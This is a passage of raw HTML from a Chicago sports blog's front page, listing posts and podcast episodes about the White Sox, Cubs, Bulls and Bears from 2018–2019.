href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/major-league-baseball/" rel="category tag">Major League Baseball</a> <a href="https://theloopsports.com/category/podcastsandvideo/" rel="category tag">Podcasts and Video</a> <a href="https://theloopsports.com/category/podcastsandvideo/the-word-on-35th-street/" rel="category tag">The Word on 35th Street</a> <a href="https://theloopsports.com/category/typical-chicago-fan/" rel="category tag">Typical Chicago Fan</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/03/02/the-word-on-35th-street-%f0%9f%94%8a-white-sox-forced-to-make-moves/" rel="bookmark">The Word on 35th Street 🔊: White Sox Forced to Make Moves?</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>With Manny Machado and Bryce Harper off the board, Nolan Arenado extending his tenure in Colorado, and one more target<a class="more-link" href="https://theloopsports.com/2019/03/02/the-word-on-35th-street-%f0%9f%94%8a-white-sox-forced-to-make-moves/">Continue Reading</a></p> </div><!-- end .entry-summary --> <footer class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/chisox44/">Anders Johanson</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/03/02/the-word-on-35th-street-%f0%9f%94%8a-white-sox-forced-to-make-moves/">March 2, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/03/02/the-word-on-35th-street-%f0%9f%94%8a-white-sox-forced-to-make-moves/#respond"><span class="screen-reader-text">Number of comments</span><span class="leave-reply">0</span></a> </span><!-- end .entry-comments --> </footer><!-- end .entry-meta --> </article><!-- #post-## --> </div><!-- end .section-three-column-one --> <div class="section-three-column-two"> <article id="post-41716" class="post-41716 post type-post status-publish format-standard has-post-thumbnail hentry category-cubs category-editorials category-typical-chicago-fan tag-cubs tag-sammy-sosa tag-white-sox"> <div class="entry-thumbnail fadein"><a href="https://theloopsports.com/2018/09/21/cubs-the-day-my-sister-gave-sammy-sosa-the-corked-bat/"><img width="800" height="450" src="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-01-11-at-12.20.22-AM.png?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" data-attachment-id="45648" data-permalink="https://theloopsports.com/screen-shot-2019-01-11-at-12-20-22-am/" data-orig-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-01-11-at-12.20.22-AM.png?fit=874%2C662&amp;ssl=1" data-orig-size="874,662" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Screen Shot 2019-01-11 at 12.20.22 AM" data-image-description="" data-medium-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-01-11-at-12.20.22-AM.png?fit=300%2C227&amp;ssl=1" data-large-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-01-11-at-12.20.22-AM.png?fit=874%2C662&amp;ssl=1" /></a></div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/cubs/" rel="category tag">Cubs</a> <a href="https://theloopsports.com/category/editorials/" rel="category tag">Editorials</a> <a href="https://theloopsports.com/category/typical-chicago-fan/" rel="category tag">Typical Chicago Fan</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2018/09/21/cubs-the-day-my-sister-gave-sammy-sosa-the-corked-bat/" rel="bookmark">Cubs: The Day My Sister Gave Sammy Sosa The Corked Bat</a></h2> </header><!-- end .entry-header --> </article><!-- #post-## --> <article id="post-41581" class="post-41581 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-typical-chicago-fan tag-chicago-cubs tag-mlb"> <div class="entry-thumbnail fadein"><a href="https://theloopsports.com/2018/09/13/cubs-capitalize-remaining-schedule/"><img width="800" height="450" src="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-01-11-at-12.20.22-AM.png?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" data-attachment-id="45648" data-permalink="https://theloopsports.com/screen-shot-2019-01-11-at-12-20-22-am/" data-orig-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-01-11-at-12.20.22-AM.png?fit=874%2C662&amp;ssl=1" data-orig-size="874,662" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Screen Shot 2019-01-11 at 12.20.22 AM" data-image-description="" data-medium-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-01-11-at-12.20.22-AM.png?fit=300%2C227&amp;ssl=1" data-large-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-01-11-at-12.20.22-AM.png?fit=874%2C662&amp;ssl=1" /></a></div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/typical-chicago-fan/" rel="category tag">Typical Chicago Fan</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2018/09/13/cubs-capitalize-remaining-schedule/" rel="bookmark">Down the Stretch, Cubs Need to Capitalize on Remaining Schedule</a></h2> </header><!-- end .entry-header --> </article><!-- #post-## --> <article id="post-41570" class="post-41570 post type-post status-publish format-standard has-post-thumbnail hentry category-newsnotes category-typical-chicago-fan tag-chciago-white-sox tag-chicago-bears tag-chicago-blackhawks tag-chicago-bulls tag-chicago-cubs"> <div class="entry-thumbnail fadein"><a href="https://theloopsports.com/2018/09/13/typical-chicago-fan-a-casual-fans-take-at-the-loop-sports/"><img width="800" height="450" src="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-01-11-at-12.20.22-AM.png?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" data-attachment-id="45648" data-permalink="https://theloopsports.com/screen-shot-2019-01-11-at-12-20-22-am/" data-orig-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-01-11-at-12.20.22-AM.png?fit=874%2C662&amp;ssl=1" data-orig-size="874,662" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Screen Shot 2019-01-11 at 12.20.22 AM" data-image-description="" data-medium-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-01-11-at-12.20.22-AM.png?fit=300%2C227&amp;ssl=1" data-large-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-01-11-at-12.20.22-AM.png?fit=874%2C662&amp;ssl=1" /></a></div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/newsnotes/" rel="category tag">News/Notes</a> <a href="https://theloopsports.com/category/typical-chicago-fan/" rel="category tag">Typical Chicago Fan</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2018/09/13/typical-chicago-fan-a-casual-fans-take-at-the-loop-sports/" rel="bookmark">Typical Chicago Fan: A Casual Fan&#8217;s Take at The Loop Sports</a></h2> </header><!-- end .entry-header --> </article><!-- #post-## --> </div><!-- end .section-three-column-two --> </section><!-- end #front-section-three --> <section id="front-section-fourcolumn" class="front-section cf"> <h3 class="front-section-title">Podcasts and Video<span><a class="all-posts-link" href="https://theloopsports.com/category/podcastsandvideo/">See all posts</a></span></h3> <div class="section-fourcolumn-postwrap columns-wrap"> <article id="post-48600" class="post-48600 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-bulls category-tlspodcasts tag-chicago-bulls tag-podcast tag-tls-podcast"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/05/14/the-loop-on-hoops-bulls-podcast-%f0%9f%8f%80-ep-3-instant-reaction-bulls-get-7th-pick-in-draft-lottery/"><img width="800" height="450" src="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" srcset="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?resize=1024%2C576&amp;ssl=1 1024w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?resize=1260%2C709&amp;ssl=1 1260w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?resize=800%2C450&amp;ssl=1 800w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?zoom=2&amp;resize=800%2C450&amp;ssl=1 1600w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="48172" data-permalink="https://theloopsports.com/2019/04/24/the-loop-on-hoops-bulls-podcast-ep-1-intro-draft-talk-and-much-more/the-loop-on-hoops-logo/" data-orig-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?fit=1926%2C1414&amp;ssl=1" data-orig-size="1926,1414" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="The Loop on Hoops Logo" data-image-description="" data-medium-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?fit=300%2C220&amp;ssl=1" data-large-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?fit=950%2C698&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/bulls/" rel="category tag">Bulls</a> <a href="https://theloopsports.com/category/podcastsandvideo/tlspodcasts/" rel="category tag">TLS Podcasts</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/14/the-loop-on-hoops-bulls-podcast-%f0%9f%8f%80-ep-3-instant-reaction-bulls-get-7th-pick-in-draft-lottery/" rel="bookmark">The Loop On Hoops Bulls Podcast 🏀: Ep. 3 – Instant Reaction: Bulls Get 7th Pick in Draft Lottery</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>The worst possible scenario for the Chicago Bulls happened. They ended up with the No. 7 overall pick in the 2019 NBA Draft for the third consecutive year. </p> </div><!-- end .entry-summary --> </article><!-- #post-## --> <article id="post-48554" class="post-48554 post type-post status-publish format-standard has-post-thumbnail hentry category-typical-chicago-fans tag-chicago-bulls tag-chicago-cubs tag-chicago-white-sox tag-nhl"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/05/13/listen-typical-chicago-fans-podcast-%f0%9f%94%8a-return-to-the-content-cave-cubs-media-talk-bulls-draft-lottery-thoughts-and-much-more/"><img width="800" height="450" src="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" srcset="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?resize=1260%2C709&amp;ssl=1 1260w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?resize=800%2C450&amp;ssl=1 800w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?zoom=2&amp;resize=800%2C450&amp;ssl=1 1600w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="41572" data-permalink="https://theloopsports.com/2018/09/13/typical-chicago-fan-a-casual-fans-take-at-the-loop-sports/newtcf_edited/" data-orig-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?fit=2000%2C2000&amp;ssl=1" data-orig-size="2000,2000" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Typical Chicago Fans TCF Podcast" data-image-description="" data-medium-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?fit=300%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?fit=950%2C950&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/podcastsandvideo/typical-chicago-fans/" rel="category tag">Typical Chicago Fans</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/13/listen-typical-chicago-fans-podcast-%f0%9f%94%8a-return-to-the-content-cave-cubs-media-talk-bulls-draft-lottery-thoughts-and-much-more/" rel="bookmark">LISTEN &#8211; Typical Chicago Fans Podcast 🔊: Return To The Content Cave, Cubs Media Talk, Bulls Draft Lottery Thoughts, and MUCH more!</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>Hello and welcome to episode 34 of Typical Chicago Fans presented by The Loop Sports. Big Z and Boomy have<a class="more-link" href="https://theloopsports.com/2019/05/13/listen-typical-chicago-fans-podcast-%f0%9f%94%8a-return-to-the-content-cave-cubs-media-talk-bulls-draft-lottery-thoughts-and-much-more/">Continue Reading</a></p> </div><!-- end .entry-summary --> </article><!-- #post-## --> <article id="post-48519" class="post-48519 post type-post status-publish format-standard has-post-thumbnail hentry category-bulls category-tlspodcasts tag-chicago-bulls"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/05/09/the-loop-on-hoops-bulls-podcast-%f0%9f%8f%80-ep-2-boylen-assistants-mel-smith-lottery-preview-more/"><img width="800" height="450" src="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" srcset="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?resize=1024%2C576&amp;ssl=1 1024w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?resize=1260%2C709&amp;ssl=1 1260w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?resize=800%2C450&amp;ssl=1 800w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?zoom=2&amp;resize=800%2C450&amp;ssl=1 1600w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="48172" data-permalink="https://theloopsports.com/2019/04/24/the-loop-on-hoops-bulls-podcast-ep-1-intro-draft-talk-and-much-more/the-loop-on-hoops-logo/" data-orig-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?fit=1926%2C1414&amp;ssl=1" data-orig-size="1926,1414" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="The Loop on Hoops Logo" data-image-description="" data-medium-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?fit=300%2C220&amp;ssl=1" data-large-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?fit=950%2C698&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/bulls/" rel="category tag">Bulls</a> <a href="https://theloopsports.com/category/podcastsandvideo/tlspodcasts/" rel="category tag">TLS Podcasts</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/09/the-loop-on-hoops-bulls-podcast-%f0%9f%8f%80-ep-2-boylen-assistants-mel-smith-lottery-preview-more/" rel="bookmark">The Loop On Hoops Bulls Podcast 🏀: Ep. 2 – Boylen Assistants, Mel Smith, Lottery Preview &#038; More</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>Dan and Nick are here with The Loop On Hoops – A Chicago Bulls podcast putting the fun back in Bulls basketball (suck it Gar/Pax).</p> </div><!-- end .entry-summary --> </article><!-- #post-## --> <article id="post-48384" class="post-48384 post type-post status-publish format-standard has-post-thumbnail hentry category-typical-chicago-fans tag-bulls tag-chicago-bears tag-chicago-bulls tag-chicago-cubs tag-chicago-white-sox tag-mlb tag-white-sox"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/05/05/listen-typical-chicago-fans-podcast%f0%9f%94%8a-tcf-goes-outdoors-cubs-stay-hot-white-sox-with-back-to-back-walk-off-winners-and-much-more/"><img width="800" height="450" src="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" srcset="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?resize=1260%2C709&amp;ssl=1 1260w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?resize=800%2C450&amp;ssl=1 800w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?zoom=2&amp;resize=800%2C450&amp;ssl=1 1600w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="41572" data-permalink="https://theloopsports.com/2018/09/13/typical-chicago-fan-a-casual-fans-take-at-the-loop-sports/newtcf_edited/" data-orig-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?fit=2000%2C2000&amp;ssl=1" data-orig-size="2000,2000" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Typical Chicago Fans TCF Podcast" data-image-description="" data-medium-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?fit=300%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?fit=950%2C950&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/podcastsandvideo/typical-chicago-fans/" rel="category tag">Typical Chicago Fans</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/05/listen-typical-chicago-fans-podcast%f0%9f%94%8a-tcf-goes-outdoors-cubs-stay-hot-white-sox-with-back-to-back-walk-off-winners-and-much-more/" rel="bookmark">LISTEN &#8211; Typical Chicago Fans Podcast 🔊: TCF Goes Outdoors, Cubs stay HOT, White Sox with Back-To-Back Walk-Off winners and MUCH more!</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>Hello and welcome to episode 33 of Typical Chicago Fans presented by The Loop Sports. Big Z and Boomy have<a class="more-link" href="https://theloopsports.com/2019/05/05/listen-typical-chicago-fans-podcast%f0%9f%94%8a-tcf-goes-outdoors-cubs-stay-hot-white-sox-with-back-to-back-walk-off-winners-and-much-more/">Continue Reading</a></p> </div><!-- end .entry-summary --> </article><!-- #post-## --> <article id="post-48353" class="post-48353 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-monsters-of-the-microphone category-monsters-of-the-microphone-podcastsandvideo category-podcastsandvideo tag-589220887 tag-bears tag-draft tag-nfc tag-nfl tag-north"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/05/04/podcast-how-did-bears-fare-in-20190-draft/"><img width="800" height="450" src="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" srcset="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?resize=1024%2C576&amp;ssl=1 1024w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?resize=1260%2C709&amp;ssl=1 1260w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?resize=800%2C450&amp;ssl=1 800w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?zoom=2&amp;resize=800%2C450&amp;ssl=1 1600w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="41410" data-permalink="https://theloopsports.com/received_315024099254961/" data-orig-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?fit=2000%2C2000&amp;ssl=1" data-orig-size="2000,2000" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Monsters of the Microphone" data-image-description="" data-medium-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?fit=300%2C300&amp;ssl=1" data-large-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?fit=950%2C950&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/monsters-of-the-microphone/" rel="category tag">Monsters of the Microphone</a> <a href="https://theloopsports.com/category/podcastsandvideo/monsters-of-the-microphone-podcastsandvideo/" rel="category tag">Monsters of the Microphone</a> <a href="https://theloopsports.com/category/podcastsandvideo/" rel="category tag">Podcasts and Video</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/04/podcast-how-did-bears-fare-in-20190-draft/" rel="bookmark">Podcast: How Did the Bears Fare in the 2019 Draft?</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>Dan DeYoung, Jack Soble, and Thomas Kavanaugh discuss the 2019 NFL Draft, going team-by-team in the NFC North and breaking<a class="more-link" href="https://theloopsports.com/2019/05/04/podcast-how-did-bears-fare-in-20190-draft/">Continue Reading</a></p> </div><!-- end .entry-summary --> </article><!-- #post-## --> <article id="post-48225" class="post-48225 post type-post status-publish format-standard has-post-thumbnail hentry category-typical-chicago-fans tag-chicago-bears tag-chicago-cubs tag-chicago-white-sox tag-tls-podcast"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/04/28/listen-typical-chicago-fans-podcast-%f0%9f%94%8a-nfl-draft-nba-nhl-playoffs-and-baseball/"><img width="800" height="450" src="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" srcset="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?resize=1260%2C709&amp;ssl=1 1260w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?resize=800%2C450&amp;ssl=1 800w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?zoom=2&amp;resize=800%2C450&amp;ssl=1 1600w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="41572" data-permalink="https://theloopsports.com/2018/09/13/typical-chicago-fan-a-casual-fans-take-at-the-loop-sports/newtcf_edited/" data-orig-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?fit=2000%2C2000&amp;ssl=1" data-orig-size="2000,2000" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Typical Chicago Fans TCF Podcast" data-image-description="" data-medium-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?fit=300%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?fit=950%2C950&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/podcastsandvideo/typical-chicago-fans/" rel="category tag">Typical Chicago Fans</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/04/28/listen-typical-chicago-fans-podcast-%f0%9f%94%8a-nfl-draft-nba-nhl-playoffs-and-baseball/" rel="bookmark">LISTEN &#8211; Typical Chicago Fans Podcast 🔊: NFL Draft, NBA/NHL Playoffs, and Baseball!</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>Big Z and Boomy welcome you to episode 32 of Typical Chicago Fans presented by The Loop Sports. The boy&#8217;s<a class="more-link" href="https://theloopsports.com/2019/04/28/listen-typical-chicago-fans-podcast-%f0%9f%94%8a-nfl-draft-nba-nhl-playoffs-and-baseball/">Continue Reading</a></p> </div><!-- end .entry-summary --> </article><!-- #post-## --> <article id="post-48171" class="post-48171 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-bulls category-tlspodcasts tag-chicago-bulls"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/04/24/the-loop-on-hoops-bulls-podcast-ep-1-intro-draft-talk-and-much-more/"><img width="800" height="450" src="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" 